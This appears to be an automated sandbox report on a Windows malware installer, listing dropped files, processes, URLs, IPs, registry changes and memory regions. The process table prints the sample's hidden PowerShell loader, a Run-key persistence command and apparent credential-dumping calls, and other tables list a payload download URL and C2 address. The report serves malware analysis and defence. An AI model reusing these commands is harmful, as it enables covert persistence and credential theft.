Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
SecuriteInfo.com.FileRepMalware.12793.28433.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
||
C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer\SecuriteInfo.com.FileRepMalware.12793.28433.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
||
C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer\SecuriteInfo.com.FileRepMalware.12793.28433.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Skeletonlike.pas
|
ASCII text, with very long lines (54310), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\json[1].json
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_juo4rwoj.wzk.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zm4bh3pc.eev.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\bhvB258.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x517d4aba, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\coqd
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer\starveacre.sne
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer\ukrudtsplanten.txt
|
ASCII text, with very long lines (397), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\skyrens.laa
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Skillemnters.Bel
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\quadrifoil.tap
|
data
|
dropped
|
There are 5 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe
|
"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$Semiexpositive=Get-Content 'C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Skeletonlike.pas';$Folkedyb=$Semiexpositive.SubString(54300,3);.$Folkedyb($Semiexpositive)"
|
||
C:\Program Files (x86)\Windows Mail\wabmig.exe
|
"C:\Program Files (x86)\windows mail\wabmig.exe"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ
/d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens%
($Unbaked)"
|
||
C:\Program Files (x86)\Windows Mail\wabmig.exe
|
"C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\coqd"
|
||
C:\Program Files (x86)\Windows Mail\wabmig.exe
|
"C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\nivooon"
|
||
C:\Program Files (x86)\Windows Mail\wabmig.exe
|
"C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\xkahpgyvtl"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens%
-windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)"
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
107.173.4.16
|
|||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://www.imvu.comr
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://geoplugin.net/json.gpl
|
unknown
|
||
http://geoplugin.net/json.gpk
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
http://cmgtrading.eu/CubBVEODo227.bin~
|
unknown
|
||
https://cmgtrading.eu/=
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
http://cmgtrading.eu/CubBVEODo227.bin
|
185.26.107.57
|
||
http://www.imvu.com
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://cmgtrading.eu/CubBVEODo227.binc
|
unknown
|
||
https://cmgtrading.eu/k
|
unknown
|
||
http://www.imvu.coma
|
unknown
|
||
http://www.nirsoft.net
|
unknown
|
||
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
https://cmgtrading.eu/CubBVEODo227.bin
|
185.26.107.57
|
||
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
https://www.google.com
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
http://cmgtrading.eu/CubBVEODo227.binzRZs
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://geoplugin.net/json.gpR
|
unknown
|
||
https://www.google.com/accounts/servicelogin
|
unknown
|
||
https://login.yahoo.com/config/login
|
unknown
|
||
http://www.nirsoft.net/
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://www.ebuddy.com
|
unknown
|
There are 23 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
cmgtrading.eu
|
185.26.107.57
|
||
geoplugin.net
|
178.237.33.50
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
107.173.4.16
|
unknown
|
United States
|
||
185.26.107.57
|
cmgtrading.eu
|
France
|
||
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Rmc-DSGECX
|
exepath
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-DSGECX
|
licence
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-DSGECX
|
time
|
||
HKEY_CURRENT_USER\enodation\paulina\cloriodid
|
Oplysningskontoret
|
||
HKEY_CURRENT_USER\langsad\behandlingstid\Returnerendes76
|
shavee
|
||
HKEY_CURRENT_USER\Miljankenvnene144\Uninstall\discoverability\Dragoners
|
grundstoffets
|
||
HKEY_CURRENT_USER\kompositioner
|
Batikker
|
||
HKEY_CURRENT_USER\Environment
|
Rykningspaategningens
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Markedsandel
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
772A000
|
heap
|
page read and write
|
||
772A000
|
heap
|
page read and write
|
||
772A000
|
heap
|
page read and write
|
||
C4AF000
|
direct allocation
|
page execute and read and write
|
||
7728000
|
heap
|
page read and write
|
||
4B19000
|
heap
|
page read and write
|
||
8970000
|
trusted library allocation
|
page read and write
|
||
53C6000
|
heap
|
page read and write
|
||
4B10000
|
heap
|
page read and write
|
||
520000
|
heap
|
page read and write
|
||
C97000
|
stack
|
page read and write
|
||
792000
|
heap
|
page read and write
|
||
4B19000
|
heap
|
page read and write
|
||
2321B000
|
unclassified section
|
page execute and read and write
|
||
4B1C000
|
heap
|
page read and write
|
||
3090000
|
direct allocation
|
page read and write
|
||
233E1000
|
heap
|
page read and write
|
||
78C0000
|
trusted library allocation
|
page execute and read and write
|
||
4B72000
|
heap
|
page read and write
|
||
4B38000
|
heap
|
page read and write
|
||
2F8E000
|
heap
|
page read and write
|
||
75F5000
|
heap
|
page read and write
|
||
30B0000
|
direct allocation
|
page read and write
|
||
65EF000
|
remote allocation
|
page execute and read and write
|
||
79C000
|
heap
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
340F000
|
stack
|
page read and write
|
||
7726000
|
heap
|
page read and write
|
||
D40000
|
direct allocation
|
page read and write
|
||
4B3A000
|
heap
|
page read and write
|
||
7705000
|
heap
|
page read and write
|
||
7719000
|
heap
|
page read and write
|
||
785E000
|
stack
|
page read and write
|
||
77A0000
|
direct allocation
|
page read and write
|
||
792000
|
heap
|
page read and write
|
||
88E000
|
stack
|
page read and write
|
||
4B19000
|
heap
|
page read and write
|
||
4FAE000
|
stack
|
page read and write
|
||
3060000
|
direct allocation
|
page read and write
|
||
78E6000
|
heap
|
page read and write
|
||
7782000
|
heap
|
page read and write
|
||
70F000
|
stack
|
page read and write
|
||
4B14000
|
heap
|
page read and write
|
||
30A0000
|
direct allocation
|
page read and write
|
||
7960000
|
trusted library allocation
|
page read and write
|
||
3010000
|
heap
|
page readonly
|
||
4B1B000
|
heap
|
page read and write
|
||
7791000
|
heap
|
page read and write
|
||
78B0000
|
trusted library allocation
|
page read and write
|
||
720000
|
heap
|
page read and write
|
||
3100000
|
trusted library allocation
|
page read and write
|
||
777E000
|
heap
|
page read and write
|
||
3034000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
3080000
|
direct allocation
|
page read and write
|
||
2ACB000
|
stack
|
page read and write
|
||
2F20000
|
heap
|
page read and write
|
||
4B21000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
23B60000
|
heap
|
page read and write
|
||
4B11000
|
heap
|
page read and write
|
||
4B78000
|
heap
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
357E000
|
stack
|
page read and write
|
||
786000
|
heap
|
page read and write
|
||
75C6000
|
heap
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
4B53000
|
heap
|
page read and write
|
||
83FD000
|
stack
|
page read and write
|
||
76A8000
|
heap
|
page read and write
|
||
23385000
|
heap
|
page read and write
|
||
380C000
|
heap
|
page read and write
|
||
22DEF000
|
stack
|
page read and write
|
||
3208000
|
heap
|
page read and write
|
||
D20000
|
direct allocation
|
page read and write
|
||
23ACD000
|
unclassified section
|
page execute and read and write
|
||
410000
|
heap
|
page read and write
|
||
23B70000
|
heap
|
page read and write
|
||
27C0000
|
heap
|
page read and write
|
||
4B6C000
|
heap
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
78F0000
|
trusted library allocation
|
page read and write
|
||
7777000
|
heap
|
page read and write
|
||
741E000
|
stack
|
page read and write
|
||
232E1000
|
heap
|
page read and write
|
||
2ED0000
|
trusted library section
|
page read and write
|
||
2F94000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
2F94000
|
heap
|
page read and write
|
||
5310000
|
trusted library allocation
|
page read and write
|
||
3034000
|
heap
|
page read and write
|
||
23385000
|
heap
|
page read and write
|
||
4B3A000
|
heap
|
page read and write
|
||
4B11000
|
heap
|
page read and write
|
||
427000
|
unkown
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
2357D000
|
heap
|
page read and write
|
||
5DE000
|
stack
|
page read and write
|
||
7880000
|
direct allocation
|
page read and write
|
||
4B14000
|
heap
|
page read and write
|
||
4B26000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
2F94000
|
heap
|
page read and write
|
||
2FE9000
|
heap
|
page read and write
|
||
4B1E000
|
heap
|
page read and write
|
||
21F0000
|
heap
|
page read and write
|
||
4B1C000
|
heap
|
page read and write
|
||
4B1C000
|
heap
|
page read and write
|
||
7B1000
|
heap
|
page read and write
|
||
4B5B000
|
heap
|
page read and write
|
||
23358000
|
heap
|
page read and write
|
||
4B20000
|
heap
|
page read and write
|
||
456000
|
system
|
page execute and read and write
|
||
4B20000
|
heap
|
page read and write
|
||
4B11000
|
heap
|
page read and write
|
||
7870000
|
direct allocation
|
page read and write
|
||
48F0000
|
trusted library allocation
|
page read and write
|
||
798000
|
heap
|
page read and write
|
||
30F3000
|
trusted library allocation
|
page execute and read and write
|
||
2F94000
|
heap
|
page read and write
|
||
777B000
|
heap
|
page read and write
|
||
41B000
|
heap
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
493E000
|
stack
|
page read and write
|
||
3125000
|
trusted library allocation
|
page execute and read and write
|
||
311A000
|
trusted library allocation
|
page execute and read and write
|
||
7510000
|
heap
|
page read and write
|
||
2306E000
|
stack
|
page read and write
|
||
2ECA000
|
stack
|
page read and write
|
||
2F30000
|
heap
|
page read and write
|
||
3034000
|
heap
|
page read and write
|
||
87D7000
|
heap
|
page read and write
|
||
78E0000
|
trusted library allocation
|
page read and write
|
||
2F30000
|
trusted library allocation
|
page read and write
|
||
2FFE000
|
stack
|
page read and write
|
||
2EE0000
|
heap
|
page read and write
|
||
4ECE000
|
stack
|
page read and write
|
||
41B000
|
system
|
page execute and read and write
|
||
84F0000
|
trusted library allocation
|
page read and write
|
||
233E1000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
7270000
|
heap
|
page read and write
|
||
2F94000
|
heap
|
page read and write
|
||
22F9D000
|
stack
|
page read and write
|
||
5310000
|
trusted library allocation
|
page read and write
|
||
27D9000
|
heap
|
page read and write
|
||
5310000
|
trusted library allocation
|
page read and write
|
||
3C60000
|
remote allocation
|
page execute and read and write
|
||
4B10000
|
heap
|
page read and write
|
||
2F2A000
|
heap
|
page read and write
|
||
3034000
|
heap
|
page read and write
|
||
4B11000
|
heap
|
page read and write
|
||
47EF000
|
remote allocation
|
page execute and read and write
|
||
7810000
|
direct allocation
|
page read and write
|
||
4B31000
|
heap
|
page read and write
|
||
235E6000
|
heap
|
page read and write
|
||
76A0000
|
heap
|
page read and write
|
||
4B1C000
|
heap
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
776E000
|
heap
|
page read and write
|
||
7B1000
|
heap
|
page read and write
|
||
5010000
|
heap
|
page read and write
|
||
59D000
|
stack
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
776E000
|
heap
|
page read and write
|
||
5E0000
|
heap
|
page read and write
|
||
798000
|
heap
|
page read and write
|
||
30DF000
|
stack
|
page read and write
|
||
27D0000
|
heap
|
page read and write
|
||
4B31000
|
heap
|
page read and write
|
||
3120000
|
trusted library allocation
|
page read and write
|
||
2F9A000
|
heap
|
page read and write
|
||
302F000
|
heap
|
page read and write
|
||
7772000
|
heap
|
page read and write
|
||
4B21000
|
heap
|
page read and write
|
||
2FA0000
|
heap
|
page read and write
|
||
789D000
|
stack
|
page read and write
|
||
2EE6000
|
heap
|
page read and write
|
||
7690000
|
direct allocation
|
page read and write
|
||
78C0000
|
heap
|
page read and write
|
||
4B3E000
|
heap
|
page read and write
|
||
84B5000
|
trusted library allocation
|
page read and write
|
||
23200000
|
unclassified section
|
page execute and read and write
|
||
4B11000
|
heap
|
page read and write
|
||
23A70000
|
unclassified section
|
page execute and read and write
|
||
4B10000
|
heap
|
page read and write
|
||
2F94000
|
heap
|
page read and write
|
||
45D000
|
system
|
page execute and read and write
|
||
2F94000
|
heap
|
page read and write
|
||
798000
|
heap
|
page read and write
|
||
2289000
|
heap
|
page read and write
|
||
327E000
|
stack
|
page read and write
|
||
4B36000
|
heap
|
page read and write
|
||
22DAE000
|
stack
|
page read and write
|
||
D10000
|
heap
|
page read and write
|
||
781E000
|
stack
|
page read and write
|
||
2B50000
|
heap
|
page read and write
|
||
435000
|
unkown
|
page read and write
|
||
2F94000
|
heap
|
page read and write
|
||
2336A000
|
heap
|
page read and write
|
||
310E000
|
stack
|
page read and write
|
||
4B53000
|
heap
|
page read and write
|
||
4B25000
|
heap
|
page read and write
|
||
6121000
|
trusted library allocation
|
page read and write
|
||
6149000
|
trusted library allocation
|
page read and write
|
||
236D0000
|
heap
|
page read and write
|
||
4B53000
|
heap
|
page read and write
|
||
3034000
|
heap
|
page read and write
|
||
777E000
|
heap
|
page read and write
|
||
2F8E000
|
stack
|
page read and write
|
||
8500000
|
trusted library allocation
|
page read and write
|
||
8990000
|
heap
|
page read and write
|
||
4F20000
|
heap
|
page read and write
|
||
4B11000
|
heap
|
page read and write
|
||
45E000
|
unkown
|
page read and write
|
||
8770000
|
heap
|
page read and write
|
||
8370000
|
heap
|
page read and write
|
||
7790000
|
trusted library allocation
|
page read and write
|
||
2F94000
|
heap
|
page read and write
|
||
79C000
|
heap
|
page read and write
|
||
6FEF000
|
remote allocation
|
page execute and read and write
|
||
4B3E000
|
heap
|
page read and write
|
||
9120000
|
direct allocation
|
page execute and read and write
|
||
22EC0000
|
direct allocation
|
page read and write
|
||
5A21000
|
trusted library allocation
|
page read and write
|
||
4B1C000
|
heap
|
page read and write
|
||
2FB0000
|
heap
|
page readonly
|
||
4B31000
|
heap
|
page read and write
|
||
34C0000
|
heap
|
page read and write
|
||
D50000
|
direct allocation
|
page read and write
|
||
23020000
|
remote allocation
|
page read and write
|
||
432000
|
heap
|
page read and write
|
||
348E000
|
stack
|
page read and write
|
||
2357B000
|
heap
|
page read and write
|
||
843F000
|
stack
|
page read and write
|
||
4B31000
|
heap
|
page read and write
|
||
530F000
|
stack
|
page read and write
|
||
4F0E000
|
stack
|
page read and write
|
||
3034000
|
heap
|
page read and write
|
||
3034000
|
heap
|
page read and write
|
||
4B1E000
|
heap
|
page read and write
|
||
3034000
|
heap
|
page read and write
|
||
54E1000
|
heap
|
page read and write
|
||
51AF000
|
stack
|
page read and write
|
||
236A0000
|
heap
|
page read and write
|
||
786000
|
heap
|
page read and write
|
||
89B0000
|
trusted library allocation
|
page read and write
|
||
2FF2000
|
heap
|
page read and write
|
||
798000
|
heap
|
page read and write
|
||
7733000
|
heap
|
page read and write
|
||
4B4E000
|
heap
|
page read and write
|
||
4B11000
|
heap
|
page read and write
|
||
5310000
|
trusted library allocation
|
page read and write
|
||
42C000
|
unkown
|
page read and write
|
||
23246000
|
direct allocation
|
page execute and read and write
|
||
4B1E000
|
heap
|
page read and write
|
||
3109000
|
trusted library allocation
|
page read and write
|
||
75CF000
|
heap
|
page read and write
|
||
480000
|
heap
|
page read and write
|
||
2F95000
|
heap
|
page read and write
|
||
4B20000
|
heap
|
page read and write
|
||
84E0000
|
trusted library allocation
|
page read and write
|
||
4B31000
|
heap
|
page read and write
|
||
4B31000
|
heap
|
page read and write
|
||
4E80000
|
heap
|
page execute and read and write
|
||
5011000
|
heap
|
page read and write
|
||
33C0000
|
heap
|
page read and write
|
||
2EFC000
|
stack
|
page read and write
|
||
3141000
|
heap
|
page read and write
|
||
497E000
|
stack
|
page read and write
|
||
2200000
|
heap
|
page read and write
|
||
2F94000
|
heap
|
page read and write
|
||
4B25000
|
heap
|
page read and write
|
||
792000
|
heap
|
page read and write
|
||
4B11000
|
heap
|
page read and write
|
||
4E85000
|
heap
|
page execute and read and write
|
||
2F00000
|
direct allocation
|
page read and write
|
||
4B31000
|
heap
|
page read and write
|
||
2F94000
|
heap
|
page read and write
|
||
4B2B000
|
heap
|
page read and write
|
||
23595000
|
heap
|
page read and write
|
||
5608000
|
heap
|
page read and write
|
||
2F60000
|
heap
|
page read and write
|
||
2F68000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
27DE000
|
heap
|
page read and write
|
||
879F000
|
heap
|
page read and write
|
||
27D6000
|
heap
|
page read and write
|
||
2336A000
|
heap
|
page read and write
|
||
2F2E000
|
heap
|
page read and write
|
||
79C000
|
heap
|
page read and write
|
||
2FE7000
|
heap
|
page read and write
|
||
4B8F000
|
heap
|
page read and write
|
||
7B1000
|
heap
|
page read and write
|
||
23671000
|
heap
|
page read and write
|
||
86EC000
|
stack
|
page read and write
|
||
89C0000
|
direct allocation
|
page execute and read and write
|
||
5B0000
|
heap
|
page read and write
|
||
344E000
|
stack
|
page read and write
|
||
7850000
|
direct allocation
|
page read and write
|
||
5018000
|
heap
|
page read and write
|
||
4B35000
|
heap
|
page read and write
|
||
4B20000
|
heap
|
page read and write
|
||
233E1000
|
heap
|
page read and write
|
||
4AF0000
|
heap
|
page read and write
|
||
4998000
|
trusted library allocation
|
page read and write
|
||
4B20000
|
heap
|
page read and write
|
||
59E000
|
stack
|
page read and write
|
||
2F94000
|
heap
|
page read and write
|
||
2F94000
|
heap
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
4B8F000
|
heap
|
page read and write
|
||
79C000
|
heap
|
page read and write
|
||
4B3A000
|
heap
|
page read and write
|
||
7820000
|
direct allocation
|
page read and write
|
||
7B1000
|
heap
|
page read and write
|
||
4B35000
|
heap
|
page read and write
|
||
233E0000
|
heap
|
page read and write
|
||
27DD000
|
heap
|
page read and write
|
||
4B31000
|
heap
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
4B1E000
|
heap
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
776D000
|
heap
|
page read and write
|
||
786000
|
heap
|
page read and write
|
||
3034000
|
heap
|
page read and write
|
||
2F94000
|
heap
|
page read and write
|
||
2FF7000
|
heap
|
page read and write
|
||
2F94000
|
heap
|
page read and write
|
||
5BEF000
|
remote allocation
|
page execute and read and write
|
||
22F4F000
|
stack
|
page read and write
|
||
5AE000
|
stack
|
page read and write
|
||
3020000
|
heap
|
page read and write
|
||
3165000
|
heap
|
page read and write
|
||
7772000
|
heap
|
page read and write
|
||
7BA000
|
heap
|
page read and write
|
||
7500000
|
heap
|
page execute and read and write
|
||
4B19000
|
heap
|
page read and write
|
||
BAAF000
|
direct allocation
|
page execute and read and write
|
||
5011000
|
heap
|
page read and write
|
||
4FEF000
|
stack
|
page read and write
|
||
4B31000
|
heap
|
page read and write
|
||
A6AF000
|
direct allocation
|
page execute and read and write
|
||
4B11000
|
heap
|
page read and write
|
||
7970000
|
trusted library allocation
|
page read and write
|
||
22FDD000
|
stack
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
51EF000
|
remote allocation
|
page execute and read and write
|
||
27DA000
|
heap
|
page read and write
|
||
5A29000
|
trusted library allocation
|
page read and write
|
||
7782000
|
heap
|
page read and write
|
||
4FB1000
|
heap
|
page read and write
|
||
5310000
|
trusted library allocation
|
page read and write
|
||
4B31000
|
heap
|
page read and write
|
||
2F2A000
|
heap
|
page read and write
|
||
2FB0000
|
heap
|
page read and write
|
||
9CAF000
|
direct allocation
|
page execute and read and write
|
||
777E000
|
heap
|
page read and write
|
||
462000
|
unkown
|
page readonly
|
||
92AF000
|
direct allocation
|
page execute and read and write
|
||
3034000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
2F30000
|
heap
|
page read and write
|
||
2336B000
|
heap
|
page read and write
|
||
792000
|
heap
|
page read and write
|
||
78D0000
|
trusted library allocation
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
311E000
|
stack
|
page read and write
|
||
23AF0000
|
unclassified section
|
page execute and read and write
|
||
4B31000
|
heap
|
page read and write
|
||
55FB000
|
heap
|
page read and write
|
||
54F2000
|
heap
|
page read and write
|
||
4B2D000
|
heap
|
page read and write
|
||
4B14000
|
heap
|
page read and write
|
||
7780000
|
trusted library allocation
|
page read and write
|
||
2BAE000
|
stack
|
page read and write
|
||
2AE2000
|
stack
|
page read and write
|
||
323E000
|
stack
|
page read and write
|
||
7900000
|
trusted library allocation
|
page read and write
|
||
3137000
|
heap
|
page read and write
|
||
42F000
|
unkown
|
page read and write
|
||
4AEF000
|
stack
|
page read and write
|
||
4B6C000
|
heap
|
page read and write
|
||
4B53000
|
heap
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
79C000
|
heap
|
page read and write
|
||
4B53000
|
heap
|
page read and write
|
||
3650000
|
trusted library allocation
|
page read and write
|
||
3034000
|
heap
|
page read and write
|
||
4B2E000
|
heap
|
page read and write
|
||
BD000
|
stack
|
page read and write
|
||
B0AF000
|
direct allocation
|
page execute and read and write
|
||
30F0000
|
trusted library allocation
|
page read and write
|
||
3070000
|
direct allocation
|
page read and write
|
||
4B20000
|
heap
|
page read and write
|
||
2660000
|
heap
|
page read and write
|
||
7727000
|
heap
|
page read and write
|
||
750000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
5011000
|
heap
|
page read and write
|
||
776E000
|
heap
|
page read and write
|
||
23AC9000
|
unclassified section
|
page execute and read and write
|
||
7260000
|
heap
|
page read and write
|
||
4B33000
|
heap
|
page read and write
|
||
7728000
|
heap
|
page read and write
|
||
23AE3000
|
unclassified section
|
page execute and read and write
|
||
22B7C000
|
stack
|
page read and write
|
||
87C2000
|
heap
|
page read and write
|
||
2F94000
|
heap
|
page read and write
|
||
4B4F000
|
heap
|
page read and write
|
||
212E000
|
stack
|
page read and write
|
||
77E0000
|
direct allocation
|
page read and write
|
||
8450000
|
heap
|
page read and write
|
||
4B11000
|
heap
|
page read and write
|
||
74F0000
|
trusted library allocation
|
page read and write
|
||
7990000
|
trusted library allocation
|
page read and write
|
||
3034000
|
heap
|
page read and write
|
||
2357B000
|
heap
|
page read and write
|
||
8780000
|
heap
|
page read and write
|
||
4B1E000
|
heap
|
page read and write
|
||
232E1000
|
heap
|
page read and write
|
||
4B1E000
|
heap
|
page read and write
|
||
4B20000
|
heap
|
page read and write
|
||
89A0000
|
trusted library allocation
|
page execute and read and write
|
||
4B56000
|
heap
|
page read and write
|
||
4B65000
|
heap
|
page read and write
|
||
4B44000
|
heap
|
page read and write
|
||
32B0000
|
heap
|
page read and write
|
||
776D000
|
heap
|
page read and write
|
||
473000
|
system
|
page execute and read and write
|
||
2F95000
|
heap
|
page read and write
|
||
4B4E000
|
heap
|
page read and write
|
||
2FDB000
|
heap
|
page read and write
|
||
2F95000
|
heap
|
page read and write
|
||
4B14000
|
heap
|
page read and write
|
||
786000
|
heap
|
page read and write
|
||
2AAC000
|
stack
|
page read and write
|
||
2F30000
|
heap
|
page read and write
|
||
4B44000
|
heap
|
page read and write
|
||
7733000
|
heap
|
page read and write
|
||
7830000
|
direct allocation
|
page read and write
|
||
87C8000
|
heap
|
page read and write
|
||
4B31000
|
heap
|
page read and write
|
||
87B5000
|
heap
|
page read and write
|
||
309F000
|
stack
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
4B20000
|
heap
|
page read and write
|
||
30F4000
|
trusted library allocation
|
page read and write
|
||
3DEF000
|
remote allocation
|
page execute and read and write
|
||
2F94000
|
heap
|
page read and write
|
||
7720000
|
trusted library allocation
|
page read and write
|
||
7930000
|
trusted library allocation
|
page read and write
|
||
5310000
|
trusted library allocation
|
page read and write
|
||
4B72000
|
heap
|
page read and write
|
||
23670000
|
heap
|
page read and write
|
||
792000
|
heap
|
page read and write
|
||
4B38000
|
heap
|
page read and write
|
||
22F0E000
|
stack
|
page read and write
|
||
4B37000
|
heap
|
page read and write
|
||
23230000
|
direct allocation
|
page read and write
|
||
7910000
|
trusted library allocation
|
page read and write
|
||
2F94000
|
heap
|
page read and write
|
||
3490000
|
heap
|
page read and write
|
||
4B1E000
|
heap
|
page read and write
|
||
78F000
|
unkown
|
page read and write
|
||
79C000
|
heap
|
page read and write
|
||
4FB0000
|
heap
|
page read and write
|
||
4B3A000
|
heap
|
page read and write
|
||
2210000
|
heap
|
page read and write
|
||
313F000
|
heap
|
page read and write
|
||
2F95000
|
heap
|
page read and write
|
||
2F94000
|
heap
|
page read and write
|
||
3034000
|
heap
|
page read and write
|
||
5710000
|
heap
|
page read and write
|
||
2B60000
|
heap
|
page readonly
|
||
2F95000
|
heap
|
page read and write
|
||
4D90000
|
trusted library allocation
|
page read and write
|
||
2ADF000
|
stack
|
page read and write
|
||
C5C000
|
stack
|
page read and write
|
||
2BB0000
|
heap
|
page read and write
|
||
302C000
|
heap
|
page read and write
|
||
4B20000
|
heap
|
page read and write
|
||
2F95000
|
heap
|
page read and write
|
||
4B11000
|
heap
|
page read and write
|
||
22EB0000
|
direct allocation
|
page read and write
|
||
2EF0000
|
direct allocation
|
page read and write
|
||
7791000
|
heap
|
page read and write
|
||
74F7000
|
trusted library allocation
|
page read and write
|
||
4B2E000
|
heap
|
page read and write
|
||
85C0000
|
trusted library allocation
|
page read and write
|
||
777E000
|
heap
|
page read and write
|
||
5310000
|
trusted library allocation
|
page read and write
|
||
77F0000
|
direct allocation
|
page read and write
|
||
5DF000
|
stack
|
page read and write
|
||
3034000
|
heap
|
page read and write
|
||
4B14000
|
heap
|
page read and write
|
||
3120000
|
heap
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
7730000
|
trusted library allocation
|
page read and write
|
||
4E2E000
|
stack
|
page read and write
|
||
3128000
|
heap
|
page read and write
|
||
4B33000
|
heap
|
page read and write
|
||
79DB000
|
stack
|
page read and write
|
||
2357D000
|
heap
|
page read and write
|
||
19A000
|
stack
|
page read and write
|
||
8380000
|
trusted library allocation
|
page execute and read and write
|
||
32B8000
|
heap
|
page read and write
|
||
